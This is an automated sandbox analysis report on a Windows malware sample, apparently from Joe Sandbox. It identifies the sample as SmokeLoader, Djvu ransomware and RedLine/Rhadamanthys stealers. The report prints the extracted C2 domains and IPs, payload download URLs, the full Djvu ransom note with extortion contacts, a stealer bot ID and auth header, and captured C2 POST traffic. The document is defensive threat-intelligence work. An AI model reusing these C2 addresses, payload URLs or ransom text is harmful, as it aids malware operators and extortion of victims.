Windows Analysis Report
file.exe

Overview

General Information

Sample Name: file.exe
Analysis ID: 791287
MD5: 6def34b7d9603c4fc7953f177f73c21a
SHA1: 82d464aedae69e9fa5ad521ceed3840595f3ad2f
SHA256: 277e1518b909735b16f393b7077e453735eb4d2dd651891f9f73da605941493b
Tags: exe
Infos:

Detection

Djvu, RHADAMANTHYS, RedLine, SmokeLoader
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Yara detected RedLine Stealer
Detected unpacking (overwrites its own PE header)
Yara detected AntiVM3
Yara detected SmokeLoader
System process connects to network (likely due to code injection or exploit)
Detected unpacking (changes PE section rights)
Antivirus detection for URL or domain
Yara detected RHADAMANTHYS Stealer
Benign windows process drops PE files
Malicious sample detected (through community Yara rule)
Yara detected Djvu Ransomware
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Maps a DLL or memory area into another process
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Machine Learning detection for sample
Allocates memory in foreign processes
Injects a PE file into a foreign processes
Deletes itself after installation
Creates a thread in another existing process (thread injection)
Hides that the sample has been downloaded from the Internet (zone.identifier)
Checks if the current machine is a virtual machine (disk enumeration)
Hides threads from debuggers
Writes to foreign memory regions
Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation))
Machine Learning detection for dropped file
C2 URLs / IPs found in malware configuration
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Contains functionality to query locales information (e.g. system language)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Found evasive API chain (date check)
Detected potential crypto function
Sample execution stops while process was sleeping (likely an evasion)
Found evasive API chain (may stop execution after checking a module file name)
JA3 SSL client fingerprint seen in connection with other malware
Contains functionality to dynamically determine API calls
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Drops files with a non-matching file extension (content does not match file extension)
Drops PE files
Tries to load missing DLLs
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Checks if the current process is being debugged
Yara detected Keylogger Generic
Dropped file seen in connection with other malware
Creates a process in suspended mode (likely to inject code)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Contains functionality for read data from the clipboard
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
Contains functionality to check if a debugger is running (IsDebuggerPresent)
PE file contains sections with non-standard names
Internet Provider seen in connection with other malware
Contains functionality to query CPU information (cpuid)
Found potential string decryption / allocating functions
Contains functionality to call native functions
Contains functionality to read the clipboard data
Found dropped PE file which has not been started or loaded
Contains functionality which may be used to detect a debugger (GetProcessHeap)
IP address seen in connection with other malware
Creates a DirectInput object (often for capturing keystrokes)
Installs a raw input device (often for capturing keystrokes)
Allocates memory with a write watch (potentially for evading sandboxes)
Detected TCP or UDP traffic on non-standard ports
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)

Classification

AV Detection
barindex
Antivirus detection for URL or domain
Source: http://potunulit.org:80/N Avira URL Cloud: Label: malware
Source: http://potunulit.org/J2v-m Avira URL Cloud: Label: malware
Source: http://drampik.com/lancer/get.php Avira URL Cloud: Label: malware
Source: http://potunulit.org/s Avira URL Cloud: Label: malware
Multi AV Scanner detection for domain / URL
Source: potunulit.org Virustotal: Detection: 11% Perma Link
Multi AV Scanner detection for dropped file
Source: C:\Users\user\AppData\Local\Temp\43D0.exe ReversingLabs: Detection: 66%
Source: C:\Users\user\AppData\Local\Temp\4434343.dll ReversingLabs: Detection: 18%
Source: C:\Users\user\AppData\Local\Temp\C4AA.exe ReversingLabs: Detection: 43%
Source: C:\Users\user\AppData\Local\Temp\C676.exe ReversingLabs: Detection: 80%
Machine Learning detection for sample
Source: file.exe Joe Sandbox ML: detected
Machine Learning detection for dropped file
Source: C:\Users\user\AppData\Roaming\beirutt Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\4434343.dll Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\C676.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\C4AA.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\43D0.exe Joe Sandbox ML: detected
Source: 00000000.00000002.397037744.00000000005F1000.00000004.10000000.00040000.00000000.sdmp Malware Configuration Extractor: SmokeLoader {"C2 list": ["http://bulimu55t.net/", "http://soryytlic4.net/", "http://bukubuka1.net/", "http://novanosa5org.org/", "http://hujukui3.net/", "http://newzelannd66.org/", "http://golilopaster.org/"]}
Source: 00000008.00000002.479914181.0000000004980000.00000040.00001000.00020000.00000000.sdmp Malware Configuration Extractor: Djvu {"Download URLs": ["http://uaery.top/dl/build2.exe", "http://drampik.com/files/1/build3.exe"], "C2 url": "http://drampik.com/lancer/get.php", "Ransom note file": "_readme.txt", "Ransom note": "ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-cud8EGMtyB\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@freshmail.top\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0637JOsie", "Ignore Files": ["ntuser.dat", "ntuser.dat.LOG1", "ntuser.dat.LOG2", "ntuser.pol", ".sys", ".ini", ".DLL", ".dll", ".blf", ".bat", ".lnk", ".regtrans-ms", "C:\\SystemID\\", "C:\\Users\\Default User\\", "C:\\Users\\Public\\", "C:\\Users\\All Users\\", "C:\\Users\\Default\\", "C:\\Documents and Settings\\", "C:\\ProgramData\\", "C:\\Recovery\\", "C:\\System Volume Information\\", "C:\\Users\\%username%\\AppData\\Roaming\\", "C:\\Users\\%username%\\AppData\\Local\\", "C:\\Windows\\", "C:\\PerfLogs\\", "C:\\ProgramData\\Microsoft\\", "C:\\ProgramData\\Package Cache\\", "C:\\Users\\Public\\", "C:\\$Recycle.Bin\\", "C:\\$WINDOWS.~BT\\", "C:\\dell\\", "C:\\Intel\\", "C:\\MSOCache\\", "C:\\Program Files\\", "C:\\Program Files (x86)\\", "C:\\Games\\", "C:\\Windows.old\\", "D:\\Users\\%username%\\AppData\\Roaming\\", "D:\\Users\\%username%\\AppData\\Local\\", "D:\\Windows\\", "D:\\PerfLogs\\", "D:\\ProgramData\\Desktop\\", "D:\\ProgramData\\Microsoft\\", "D:\\ProgramData\\Package Cache\\", "D:\\Users\\Public\\", "D:\\$Recycle.Bin\\", "D:\\$WINDOWS.~BT\\", "D:\\dell\\", "D:\\Intel\\", "D:\\MSOCache\\", "D:\\Program Files\\", "D:\\Program Files (x86)\\", "D:\\Games\\", "E:\\Users\\%username%\\AppData\\Roaming\\", "E:\\Users\\%username%\\AppData\\Local\\", "E:\\Windows\\", "E:\\PerfLogs\\", "E:\\ProgramData\\Desktop\\", "E:\\ProgramData\\Microsoft\\", "E:\\ProgramData\\Package Cache\\", "E:\\Users\\Public\\", "E:\\$Recycle.Bin\\", "E:\\$WINDOWS.~BT\\", "E:\\dell\\", "E:\\Intel\\", "E:\\MSOCache\\", "E:\\Program Files\\", "E:\\Program Files (x86)\\", "E:\\Games\\", "F:\\Users\\%username%\\AppData\\Roaming\\", "F:\\Users\\%username%\\AppData\\Local\\", "F:\\Wi
Source: 9.3.C4AA.exe.df30000.1.unpack Malware Configuration Extractor: RedLine {"C2 url": ["89.208.103.88:37538"], "Bot Id": "birj proliv", "Authorization Header": "9941068ef2768ed5ba54fc3eed22d795"}

Compliance
barindex
Detected unpacking (overwrites its own PE header)
Source: C:\Users\user\AppData\Local\Temp\C676.exe Unpacked PE file: 6.2.C676.exe.400000.0.unpack
Source: C:\Users\user\AppData\Local\Temp\43D0.exe Unpacked PE file: 10.2.43D0.exe.400000.0.unpack
Uses 32bit PE files
Source: file.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: C:\Users\user\Desktop\file.exe File opened: C:\Windows\SysWOW64\msvcr100.dll Jump to behavior
Source: unknown HTTPS traffic detected: 162.0.217.254:443 -> 192.168.2.4:49737 version: TLS 1.2
Source: Binary string: wkernel32.pdb source: fontview.exe, 0000000D.00000003.515386318.0000000004D70000.00000004.00001000.00020000.00000000.sdmp, fontview.exe, 0000000D.00000003.514698930.0000000004C4C000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: WINMMBASE.pdbUGP source: fontview.exe, 0000000D.00000003.562076898.0000000004C40000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: ucrtbase.pdb source: fontview.exe, 0000000D.00000003.526678012.0000000005170000.00000004.00001000.00020000.00000000.sdmp, fontview.exe, 0000000D.00000003.526108390.0000000004C4D000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: msvcrt.pdb source: fontview.exe, 0000000D.00000003.521974726.0000000004C4E000.00000004.00000020.00020000.00000000.sdmp, fontview.exe, 0000000D.00000003.522197906.0000000004D10000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: wrpcrt4.pdb source: fontview.exe, 0000000D.00000003.523535376.0000000004D10000.00000004.00001000.00020000.00000000.sdmp, fontview.exe, 0000000D.00000003.522585923.0000000004C4F000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: wntdll.pdb source: fontview.exe, 0000000D.00000002.574375673.0000000004DE0000.00000004.00001000.00020000.00000000.sdmp, fontview.exe, 0000000D.00000003.511481087.0000000004C44000.00000004.00000020.00020000.00000000.sdmp, fontview.exe, 0000000D.00000003.510890139.0000000004C46000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: shcore.pdb source: fontview.exe, 0000000D.00000003.535582414.0000000004C45000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: wwin32u.pdbGCTL source: fontview.exe, 0000000D.00000003.529166790.0000000004C40000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: bcryptprimitives.pdbUGP source: fontview.exe, 0000000D.00000003.524433598.0000000004C40000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: _C:\fepovilorefego5.pdb source: explorer.exe, 00000003.00000003.445965683.0000000004AC0000.00000004.00000001.00020000.00000000.sdmp, C676.exe, 00000006.00000000.445306622.0000000000401000.00000020.00000001.01000000.00000006.sdmp, C676.exe.3.dr
Source: Binary string: setupapi.pdbUGP source: fontview.exe, 0000000D.00000003.564997815.0000000005178000.00000004.00000020.00020000.00000000.sdmp, fontview.exe, 0000000D.00000003.567165020.00000000055B0000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: wgdi32.pdb source: fontview.exe, 0000000D.00000003.524543402.0000000004C40000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: fltLib.pdb source: fontview.exe, 0000000D.00000003.557086498.0000000004B20000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: advapi32.pdb source: fontview.exe, 0000000D.00000003.521207061.0000000004C40000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: wsspicli.pdb source: fontview.exe, 0000000D.00000003.524283148.0000000004C40000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: winmm.pdbUGP source: fontview.exe, 0000000D.00000003.561765846.0000000004C40000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: cfgmgr32.pdbUGP source: fontview.exe, 0000000D.00000003.546083701.0000000004C40000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: C:\nujiwucosunes\vezik.pdb source: explorer.exe, 00000003.00000003.463370159.0000000006570000.00000004.00000001.00020000.00000000.sdmp, 43D0.exe, 00000008.00000002.477465572.0000000000401000.00000020.00000001.01000000.00000008.sdmp, 43D0.exe, 00000008.00000000.462284028.0000000000401000.00000020.00000001.01000000.00000008.sdmp, 43D0.exe, 0000000A.00000000.475726435.0000000000401000.00000020.00000001.01000000.00000008.sdmp
Source: Binary string: shell32.pdb source: fontview.exe, 0000000D.00000003.543911919.00000000064F0000.00000004.00001000.00020000.00000000.sdmp, fontview.exe, 0000000D.00000003.541667280.0000000005177000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdb source: 43D0.exe, 00000008.00000002.479914181.0000000004980000.00000040.00001000.00020000.00000000.sdmp, 43D0.exe, 0000000A.00000002.481185705.0000000000400000.00000040.00000400.00020000.00000000.sdmp
Source: Binary string: wrpcrt4.pdbUGP source: fontview.exe, 0000000D.00000003.523535376.0000000004D10000.00000004.00001000.00020000.00000000.sdmp, fontview.exe, 0000000D.00000003.522585923.0000000004C4F000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Timayiko\Kodale\hiwer\Fami\Somayofa wiho.pdb source: C4AA.exe, 00000009.00000000.469180879.00000000009BC000.00000002.00000001.01000000.00000009.sdmp, C4AA.exe, 00000009.00000002.573291842.00000000009BC000.00000002.00000001.01000000.00000009.sdmp
Source: Binary string: msvcp_win.pdb source: fontview.exe, 0000000D.00000003.525933343.0000000004C40000.00000004.00001000.00020000.00000000.sdmp, fontview.exe, 0000000D.00000002.581848569.0000000004F70000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: psapi.pdbUGP source: fontview.exe, 0000000D.00000003.564929757.0000000004B20000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: wgdi32.pdbUGP source: fontview.exe, 0000000D.00000003.524543402.0000000004C40000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: wkernelbase.pdb source: fontview.exe, 0000000D.00000003.516786735.0000000004F75000.00000004.00000020.00020000.00000000.sdmp, fontview.exe, 0000000D.00000003.518946338.0000000005160000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: wimm32.pdb source: fontview.exe, 0000000D.00000003.557166889.0000000004C40000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: mpr.pdb source: fontview.exe, 0000000D.00000003.569388235.0000000004C40000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: shlwapi.pdb source: fontview.exe, 0000000D.00000003.529256728.0000000004C40000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: wsspicli.pdbGCTL source: fontview.exe, 0000000D.00000003.524283148.0000000004C40000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: wwin32u.pdb source: fontview.exe, 0000000D.00000003.529166790.0000000004C40000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: shlwapi.pdbUGP source: fontview.exe, 0000000D.00000003.529256728.0000000004C40000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: setupapi.pdb source: fontview.exe, 0000000D.00000003.564997815.0000000005178000.00000004.00000020.00020000.00000000.sdmp, fontview.exe, 0000000D.00000003.567165020.00000000055B0000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: 3C:\nujiwucosunes\vezik.pdb` source: explorer.exe, 00000003.00000003.463370159.0000000006570000.00000004.00000001.00020000.00000000.sdmp, 43D0.exe, 00000008.00000002.477465572.0000000000401000.00000020.00000001.01000000.00000008.sdmp, 43D0.exe, 00000008.00000000.462284028.0000000000401000.00000020.00000001.01000000.00000008.sdmp, 43D0.exe, 0000000A.00000000.475726435.0000000000401000.00000020.00000001.01000000.00000008.sdmp
Source: Binary string: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdbI source: 43D0.exe, 00000008.00000002.479914181.0000000004980000.00000040.00001000.00020000.00000000.sdmp, 43D0.exe, 0000000A.00000002.481185705.0000000000400000.00000040.00000400.00020000.00000000.sdmp
Source: Binary string: combase.pdbUGP source: fontview.exe, 0000000D.00000003.531161871.00000000053E0000.00000004.00001000.00020000.00000000.sdmp, fontview.exe, 0000000D.00000003.529637383.0000000005173000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: ucrtbase.pdbUGP source: fontview.exe, 0000000D.00000003.526678012.0000000005170000.00000004.00001000.00020000.00000000.sdmp, fontview.exe, 0000000D.00000003.526108390.0000000004C4D000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: wkernelbase.pdbUGP source: fontview.exe, 0000000D.00000003.516786735.0000000004F75000.00000004.00000020.00020000.00000000.sdmp, fontview.exe, 0000000D.00000003.518946338.0000000005160000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: cryptbase.pdbUGP source: fontview.exe, 0000000D.00000003.524332169.0000000004B20000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: wuser32.pdbUGP source: fontview.exe, 0000000D.00000003.528194183.0000000005170000.00000004.00001000.00020000.00000000.sdmp, fontview.exe, 0000000D.00000003.527333609.0000000004C49000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: shell32.pdbUGP source: fontview.exe, 0000000D.00000003.543911919.00000000064F0000.00000004.00001000.00020000.00000000.sdmp, fontview.exe, 0000000D.00000003.541667280.0000000005177000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: fltLib.pdbGCTL source: fontview.exe, 0000000D.00000003.557086498.0000000004B20000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: wimm32.pdbUGP source: fontview.exe, 0000000D.00000003.557166889.0000000004C40000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: WINMMBASE.pdb source: fontview.exe, 0000000D.00000003.562076898.0000000004C40000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: comdlg32.pdb source: fontview.exe, 0000000D.00000003.533865783.0000000005170000.00000004.00001000.00020000.00000000.sdmp, fontview.exe, 0000000D.00000003.533344603.0000000004C4D000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: wgdi32full.pdbUGP source: fontview.exe, 0000000D.00000003.525163286.0000000004FEC000.00000004.00001000.00020000.00000000.sdmp, fontview.exe, 0000000D.00000003.524730073.0000000004CC4000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: profapi.pdb source: fontview.exe, 0000000D.00000003.551602215.0000000004C40000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: ws2_32.pdb source: fontview.exe, 0000000D.00000003.564725237.0000000004C40000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: comdlg32.pdbUGP source: fontview.exe, 0000000D.00000003.533865783.0000000005170000.00000004.00001000.00020000.00000000.sdmp, fontview.exe, 0000000D.00000003.533344603.0000000004C4D000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: wgdi32full.pdb source: fontview.exe, 0000000D.00000003.525163286.0000000004FEC000.00000004.00001000.00020000.00000000.sdmp, fontview.exe, 0000000D.00000003.524730073.0000000004CC4000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: shcore.pdbUGP source: fontview.exe, 0000000D.00000003.535582414.0000000004C45000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: mpr.pdbUGP source: fontview.exe, 0000000D.00000003.569388235.0000000004C40000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: sechost.pdb source: fontview.exe, 0000000D.00000003.522483287.0000000004C40000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: XAMLHostHwndvolumelabelmasteredudfhelpJOLIETUDFData\Program Files\$Windows.~BT\Windows\ProgramData\Program Files (x86)\Program Files\Data\Windows\Data\ProgramData\Data\Program Files (x86)\.cer.cdxml.cat.automaticdestinations-ms.appxpackage.appxbundle.appxWindows.old\.fon.etl.efi.dsft.dmp.customdestinations-ms.cookie.msm.msip.mpb.mp.p12.p10.otf.ost.olb.ocx.nst.mui.pdb.partial.p7x.p7s.p7r.p7m.p7c.p7b.psf.psd1.pfx.pfm.pem.ttc.sys.sst.spkg.spc.sft.rll.winmd.wim.wfs.vsix.vsi.vmrs.vmcxWININET.xap%s (%d).%s\shellIfExecBrowserFlagsft%06dNeverShowExtAlwaysShowExtTopicL source: fontview.exe, 0000000D.00000003.543911919.00000000064F0000.00000004.00001000.00020000.00000000.sdmp, fontview.exe, 0000000D.00000003.541667280.0000000005177000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: wntdll.pdbUGP source: fontview.exe, 0000000D.00000002.574375673.0000000004DE0000.00000004.00001000.00020000.00000000.sdmp, fontview.exe, 0000000D.00000003.511481087.0000000004C44000.00000004.00000020.00020000.00000000.sdmp, fontview.exe, 0000000D.00000003.510890139.0000000004C46000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\fepovilorefego5.pdb source: explorer.exe, 00000003.00000003.445965683.0000000004AC0000.00000004.00000001.00020000.00000000.sdmp, C676.exe, 00000006.00000000.445306622.0000000000401000.00000020.00000001.01000000.00000006.sdmp, C676.exe.3.dr
Source: Binary string: ole32.pdbUGP source: fontview.exe, 0000000D.00000003.559665938.0000000005170000.00000004.00001000.00020000.00000000.sdmp, fontview.exe, 0000000D.00000003.557527438.0000000004C40000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\xayagejutuximo.pdb source: file.exe, beirutt.3.dr
Source: Binary string: winmm.pdb source: fontview.exe, 0000000D.00000003.561765846.0000000004C40000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: powrprof.pdbUGP source: fontview.exe, 0000000D.00000003.556519697.0000000004C40000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: powrprof.pdb source: fontview.exe, 0000000D.00000003.556519697.0000000004C40000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: wmswsock.pdb source: fontview.exe, 0000000D.00000002.573666518.0000000004B40000.00000004.00000020.00020000.00000000.sdmp, fontview.exe, 0000000D.00000003.569483421.0000000004C40000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: ole32.pdb source: fontview.exe, 0000000D.00000003.559665938.0000000005170000.00000004.00001000.00020000.00000000.sdmp, fontview.exe, 0000000D.00000003.557527438.0000000004C40000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: Kernel.Appcore.pdbUGP source: fontview.exe, 0000000D.00000003.550884226.0000000004B20000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: sechost.pdbUGP source: fontview.exe, 0000000D.00000003.522483287.0000000004C40000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: wkernel32.pdbGCTL source: fontview.exe, 0000000D.00000003.515386318.0000000004D70000.00000004.00001000.00020000.00000000.sdmp, fontview.exe, 0000000D.00000003.514698930.0000000004C4C000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: comctl32.pdbUGP source: fontview.exe, 0000000D.00000003.552104294.0000000005172000.00000004.00000020.00020000.00000000.sdmp, fontview.exe, 0000000D.00000003.554344562.0000000005380000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: Kernel.Appcore.pdb source: fontview.exe, 0000000D.00000003.550884226.0000000004B20000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: psapi.pdb source: fontview.exe, 0000000D.00000003.564929757.0000000004B20000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: msvcp_win.pdbUGP source: fontview.exe, 0000000D.00000003.525933343.0000000004C40000.00000004.00001000.00020000.00000000.sdmp, fontview.exe, 0000000D.00000002.581848569.0000000004F70000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: advapi32.pdbUGP source: fontview.exe, 0000000D.00000003.521207061.0000000004C40000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: cryptbase.pdb source: fontview.exe, 0000000D.00000003.524332169.0000000004B20000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: oleaut32.pdbUGP source: fontview.exe, 0000000D.00000003.563958937.0000000004CF0000.00000004.00001000.00020000.00000000.sdmp, fontview.exe, 0000000D.00000003.562324690.0000000004C4F000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: bcryptprimitives.pdb source: fontview.exe, 0000000D.00000003.524433598.0000000004C40000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: cfgmgr32.pdb source: fontview.exe, 0000000D.00000003.546083701.0000000004C40000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: combase.pdb source: fontview.exe, 0000000D.00000003.531161871.00000000053E0000.00000004.00001000.00020000.00000000.sdmp, fontview.exe, 0000000D.00000003.529637383.0000000005173000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: profapi.pdbUGP source: fontview.exe, 0000000D.00000003.551602215.0000000004C40000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: wmswsock.pdbUGP source: fontview.exe, 0000000D.00000002.573666518.0000000004B40000.00000004.00000020.00020000.00000000.sdmp, fontview.exe, 0000000D.00000003.569483421.0000000004C40000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: oleaut32.pdb source: fontview.exe, 0000000D.00000003.563958937.0000000004CF0000.00000004.00001000.00020000.00000000.sdmp, fontview.exe, 0000000D.00000003.562324690.0000000004C4F000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: TC:\xayagejutuximo.pdb$~B|.@ source: file.exe, beirutt.3.dr
Source: Binary string: wuser32.pdb source: fontview.exe, 0000000D.00000003.528194183.0000000005170000.00000004.00001000.00020000.00000000.sdmp, fontview.exe, 0000000D.00000003.527333609.0000000004C49000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: comctl32.pdb source: fontview.exe, 0000000D.00000003.552104294.0000000005172000.00000004.00000020.00020000.00000000.sdmp, fontview.exe, 0000000D.00000003.554344562.0000000005380000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: ws2_32.pdbUGP source: fontview.exe, 0000000D.00000003.564725237.0000000004C40000.00000004.00001000.00020000.00000000.sdmp
Source: C:\Users\user\AppData\Local\Temp\C676.exe Code function: 6_2_00428390 FindFirstFileExW, 6_2_00428390

Networking
barindex
System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\explorer.exe Domain query: potunulit.org
Source: C:\Windows\explorer.exe Network Connect: 188.114.96.3 80 Jump to behavior
C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor URLs: http://drampik.com/lancer/get.php
Source: Malware configuration extractor URLs: 89.208.103.88:37538
Source: Malware configuration extractor URLs: http://bulimu55t.net/
Source: Malware configuration extractor URLs: http://soryytlic4.net/
Source: Malware configuration extractor URLs: http://bukubuka1.net/
Source: Malware configuration extractor URLs: http://novanosa5org.org/
Source: Malware configuration extractor URLs: http://hujukui3.net/
Source: Malware configuration extractor URLs: http://newzelannd66.org/
Source: Malware configuration extractor URLs: http://golilopaster.org/
JA3 SSL client fingerprint seen in connection with other malware
Source: Joe Sandbox View JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
Uses a known web browser user agent for HTTP communication
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://ryjphgb.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 164Host: potunulit.org
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://egqgnqk.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 215Host: potunulit.org
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://aygtqn.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 237Host: potunulit.org
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://fedface.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 291Host: potunulit.org
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://pghirnwb.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 218Host: potunulit.org
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://hkrpyqspb.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 284Host: potunulit.org
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://jwoitvech.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 280Host: potunulit.org
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://fedbh.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 331Host: potunulit.org
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://fyugji.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 152Host: potunulit.org
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://mlleyedksk.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 341Host: potunulit.org
